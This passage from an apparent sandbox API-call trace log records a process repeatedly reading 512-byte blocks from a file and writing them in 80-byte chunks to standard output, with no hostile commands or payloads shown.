nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.729] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.729] GetFileType (hFile=0x4c) returned 0x1 [0112.729] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.729] GetFileType (hFile=0x4c) returned 0x1 [0112.729] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.729] WriteFile (in: hFile=0x4c, lpBuffer=0x28f1f4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.729] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.729] GetFileType (hFile=0x4c) returned 0x1 [0112.729] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.729] WriteFile (in: hFile=0x4c, lpBuffer=0x28f244*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f244*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.729] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.729] GetFileType (hFile=0x4c) returned 0x1 [0112.730] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.730] WriteFile (in: hFile=0x4c, lpBuffer=0x28f294*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f294*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.730] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.730] GetFileType (hFile=0x4c) returned 0x1 [0112.730] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.730] WriteFile (in: hFile=0x4c, lpBuffer=0x28f2e4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f2e4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.730] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.730] GetFileType (hFile=0x4c) returned 0x1 [0112.730] _get_osfhandle (_FileHandle=1) returned 
0x4c [0112.730] WriteFile (in: hFile=0x4c, lpBuffer=0x28f334*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f334*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.730] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.730] GetFileType (hFile=0x4c) returned 0x1 [0112.730] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.730] WriteFile (in: hFile=0x4c, lpBuffer=0x28f384*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f384*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.730] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.730] GetFileType (hFile=0x4c) returned 0x1 [0112.730] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.730] WriteFile (in: hFile=0x4c, lpBuffer=0x28f3d4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f3d4*, lpNumberOfBytesWritten=0x28e3d8*=0x20, lpOverlapped=0x0) returned 1 [0112.730] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.730] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28e3c4 | out: lpNewFilePointer=0x0) returned 1 [0112.730] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.730] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.730] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.730] GetFileType (hFile=0x4c) returned 0x1 [0112.730] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.730] GetFileType (hFile=0x4c) returned 0x1 [0112.730] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.730] WriteFile (in: hFile=0x4c, lpBuffer=0x28f1f4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) 
returned 1 [0112.730] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.730] GetFileType (hFile=0x4c) returned 0x1 [0112.730] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.731] WriteFile (in: hFile=0x4c, lpBuffer=0x28f244*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f244*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.731] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.731] GetFileType (hFile=0x4c) returned 0x1 [0112.731] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.731] WriteFile (in: hFile=0x4c, lpBuffer=0x28f294*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f294*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.731] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.731] GetFileType (hFile=0x4c) returned 0x1 [0112.731] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.731] WriteFile (in: hFile=0x4c, lpBuffer=0x28f2e4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f2e4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.731] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.731] GetFileType (hFile=0x4c) returned 0x1 [0112.731] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.731] WriteFile (in: hFile=0x4c, lpBuffer=0x28f334*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f334*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.731] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.731] GetFileType (hFile=0x4c) returned 0x1 [0112.731] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.731] WriteFile (in: hFile=0x4c, lpBuffer=0x28f384*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f384*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.731] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0112.731] GetFileType (hFile=0x4c) returned 0x1 [0112.731] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.731] WriteFile (in: hFile=0x4c, lpBuffer=0x28f3d4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f3d4*, lpNumberOfBytesWritten=0x28e3d8*=0x20, lpOverlapped=0x0) returned 1 [0112.731] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.731] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28e3c4 | out: lpNewFilePointer=0x0) returned 1 [0112.731] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.731] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.731] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.731] GetFileType (hFile=0x4c) returned 0x1 [0112.731] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.731] GetFileType (hFile=0x4c) returned 0x1 [0112.731] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.731] WriteFile (in: hFile=0x4c, lpBuffer=0x28f1f4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.732] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.732] GetFileType (hFile=0x4c) returned 0x1 [0112.732] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.732] WriteFile (in: hFile=0x4c, lpBuffer=0x28f244*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f244*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.732] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.732] GetFileType (hFile=0x4c) returned 0x1 [0112.732] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.732] WriteFile (in: hFile=0x4c, lpBuffer=0x28f294*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f294*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.732] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.732] GetFileType (hFile=0x4c) returned 0x1 [0112.732] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.732] WriteFile (in: hFile=0x4c, lpBuffer=0x28f2e4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f2e4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.732] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.732] GetFileType (hFile=0x4c) returned 0x1 [0112.732] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.732] WriteFile (in: hFile=0x4c, lpBuffer=0x28f334*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f334*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.732] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.732] GetFileType (hFile=0x4c) returned 0x1 [0112.732] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.732] WriteFile (in: hFile=0x4c, lpBuffer=0x28f384*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f384*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.732] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.732] GetFileType (hFile=0x4c) returned 0x1 [0112.732] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.732] WriteFile (in: hFile=0x4c, lpBuffer=0x28f3d4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f3d4*, lpNumberOfBytesWritten=0x28e3d8*=0x20, lpOverlapped=0x0) returned 1 [0112.732] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.732] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28e3c4 | out: lpNewFilePointer=0x0) returned 1 [0112.732] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.732] ReadFile 
(in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.732] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.732] GetFileType (hFile=0x4c) returned 0x1 [0112.732] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.732] GetFileType (hFile=0x4c) returned 0x1 [0112.732] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.733] WriteFile (in: hFile=0x4c, lpBuffer=0x28f1f4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.733] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.733] GetFileType (hFile=0x4c) returned 0x1 [0112.733] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.733] WriteFile (in: hFile=0x4c, lpBuffer=0x28f244*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f244*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.733] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.733] GetFileType (hFile=0x4c) returned 0x1 [0112.733] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.733] WriteFile (in: hFile=0x4c, lpBuffer=0x28f294*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f294*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.733] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.733] GetFileType (hFile=0x4c) returned 0x1 [0112.733] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.733] WriteFile (in: hFile=0x4c, lpBuffer=0x28f2e4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f2e4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.733] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.733] GetFileType (hFile=0x4c) returned 0x1 [0112.733] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0112.733] WriteFile (in: hFile=0x4c, lpBuffer=0x28f334*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f334*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.733] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.733] GetFileType (hFile=0x4c) returned 0x1 [0112.733] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.733] WriteFile (in: hFile=0x4c, lpBuffer=0x28f384*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f384*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.733] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.733] GetFileType (hFile=0x4c) returned 0x1 [0112.733] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.733] WriteFile (in: hFile=0x4c, lpBuffer=0x28f3d4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f3d4*, lpNumberOfBytesWritten=0x28e3d8*=0x20, lpOverlapped=0x0) returned 1 [0112.733] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.733] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28e3c4 | out: lpNewFilePointer=0x0) returned 1 [0112.733] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.733] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.733] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.733] GetFileType (hFile=0x4c) returned 0x1 [0112.733] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.733] GetFileType (hFile=0x4c) returned 0x1 [0112.733] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.734] WriteFile (in: hFile=0x4c, lpBuffer=0x28f1f4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, 
lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.734] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.734] GetFileType (hFile=0x4c) returned 0x1 [0112.734] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.734] WriteFile (in: hFile=0x4c, lpBuffer=0x28f244*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f244*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.734] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.734] GetFileType (hFile=0x4c) returned 0x1 [0112.734] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.734] WriteFile (in: hFile=0x4c, lpBuffer=0x28f294*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f294*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.734] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.734] GetFileType (hFile=0x4c) returned 0x1 [0112.734] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.734] WriteFile (in: hFile=0x4c, lpBuffer=0x28f2e4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f2e4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.734] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.734] GetFileType (hFile=0x4c) returned 0x1 [0112.734] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.734] WriteFile (in: hFile=0x4c, lpBuffer=0x28f334*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f334*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.734] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.734] GetFileType (hFile=0x4c) returned 0x1 [0112.734] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.734] WriteFile (in: hFile=0x4c, lpBuffer=0x28f384*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f384*, lpNumberOfBytesWritten=0x28e3d8*=0x50, 
lpOverlapped=0x0) returned 1 [0112.734] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.734] GetFileType (hFile=0x4c) returned 0x1 [0112.734] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.734] WriteFile (in: hFile=0x4c, lpBuffer=0x28f3d4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f3d4*, lpNumberOfBytesWritten=0x28e3d8*=0x20, lpOverlapped=0x0) returned 1 [0112.734] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.734] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28e3c4 | out: lpNewFilePointer=0x0) returned 1 [0112.734] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.734] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.734] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.734] GetFileType (hFile=0x4c) returned 0x1 [0112.734] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.734] GetFileType (hFile=0x4c) returned 0x1 [0112.735] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.735] WriteFile (in: hFile=0x4c, lpBuffer=0x28f1f4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.735] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.735] GetFileType (hFile=0x4c) returned 0x1 [0112.735] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.735] WriteFile (in: hFile=0x4c, lpBuffer=0x28f244*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f244*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.735] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.735] GetFileType (hFile=0x4c) returned 0x1 [0112.735] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.735] WriteFile (in: hFile=0x4c, 
lpBuffer=0x28f294*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f294*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.735] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.735] GetFileType (hFile=0x4c) returned 0x1 [0112.735] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.735] WriteFile (in: hFile=0x4c, lpBuffer=0x28f2e4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f2e4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.735] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.735] GetFileType (hFile=0x4c) returned 0x1 [0112.735] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.735] WriteFile (in: hFile=0x4c, lpBuffer=0x28f334*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f334*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.735] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.735] GetFileType (hFile=0x4c) returned 0x1 [0112.735] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.735] WriteFile (in: hFile=0x4c, lpBuffer=0x28f384*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f384*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.735] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.735] GetFileType (hFile=0x4c) returned 0x1 [0112.735] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.735] WriteFile (in: hFile=0x4c, lpBuffer=0x28f3d4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f3d4*, lpNumberOfBytesWritten=0x28e3d8*=0x20, lpOverlapped=0x0) returned 1 [0112.735] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.735] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28e3c4 | out: lpNewFilePointer=0x0) returned 1 [0112.735] _get_osfhandle 
(_FileHandle=4) returned 0x54 [0112.735] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.735] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.735] GetFileType (hFile=0x4c) returned 0x1 [0112.735] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.735] GetFileType (hFile=0x4c) returned 0x1 [0112.735] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.736] WriteFile (in: hFile=0x4c, lpBuffer=0x28f1f4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.736] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.736] GetFileType (hFile=0x4c) returned 0x1 [0112.736] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.736] WriteFile (in: hFile=0x4c, lpBuffer=0x28f244*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f244*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.736] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.736] GetFileType (hFile=0x4c) returned 0x1 [0112.736] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.736] WriteFile (in: hFile=0x4c, lpBuffer=0x28f294*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f294*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.736] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.736] GetFileType (hFile=0x4c) returned 0x1 [0112.736] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.736] WriteFile (in: hFile=0x4c, lpBuffer=0x28f2e4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f2e4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.736] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.736] 
GetFileType (hFile=0x4c) returned 0x1 [0112.736] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.736] WriteFile (in: hFile=0x4c, lpBuffer=0x28f334*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f334*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.736] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.736] GetFileType (hFile=0x4c) returned 0x1 [0112.736] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.736] WriteFile (in: hFile=0x4c, lpBuffer=0x28f384*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f384*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.736] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.736] GetFileType (hFile=0x4c) returned 0x1 [0112.736] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.736] WriteFile (in: hFile=0x4c, lpBuffer=0x28f3d4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f3d4*, lpNumberOfBytesWritten=0x28e3d8*=0x20, lpOverlapped=0x0) returned 1 [0112.736] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.736] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28e3c4 | out: lpNewFilePointer=0x0) returned 1 [0112.736] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.736] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.736] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.736] GetFileType (hFile=0x4c) returned 0x1 [0112.736] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.736] GetFileType (hFile=0x4c) returned 0x1 [0112.737] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.737] WriteFile (in: hFile=0x4c, lpBuffer=0x28f1f4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | 
